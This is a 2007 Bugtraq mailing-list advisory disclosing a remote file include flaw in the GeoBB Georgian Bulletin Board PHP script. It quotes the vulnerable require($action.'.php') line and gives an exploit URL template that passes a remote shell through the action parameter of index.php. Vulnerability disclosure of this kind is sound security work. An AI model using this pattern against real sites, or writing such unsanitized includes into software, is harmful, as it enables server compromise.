[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

GeoBB Georgian Bulletin Board Remote File Include Vuln.

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: GeoBB Georgian Bulletin Board Remote File Include Vuln.
From: ShaFuq31@xxxxxxxxxxx
Date: 7 Jan 2007 14:46:40 -0000

# BhhGroup.Org & Bilgi-Yonetimi.Org.Tr

# script name : GeoBB Georgian Bulletin Board

# Script Download : http://hotscripts.com/Detailed/58100.html

# Risk : High

# Found By : ShaFuck31

# Vulnerable file : index.php

Vuln. Code:
require($action.'.php');

#Vuln :
http://www.victim.com/ScriptPath/index.php?action=[sheLL]

# Thanks : 4LL bL4ck h4t us3rs & my fr13ndZ

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]

Prev by Date: Re: Perforce client: security hole by design
Next by Date: Re: SAP Security Contact
Previous by thread: Dayfox Blog Remote File Include Vuln.
Next by thread: TK53 Advisory #1: CenterICQ remote DoS buffer overflow in LiveJournal handling
Index(es):
- Date
- Thread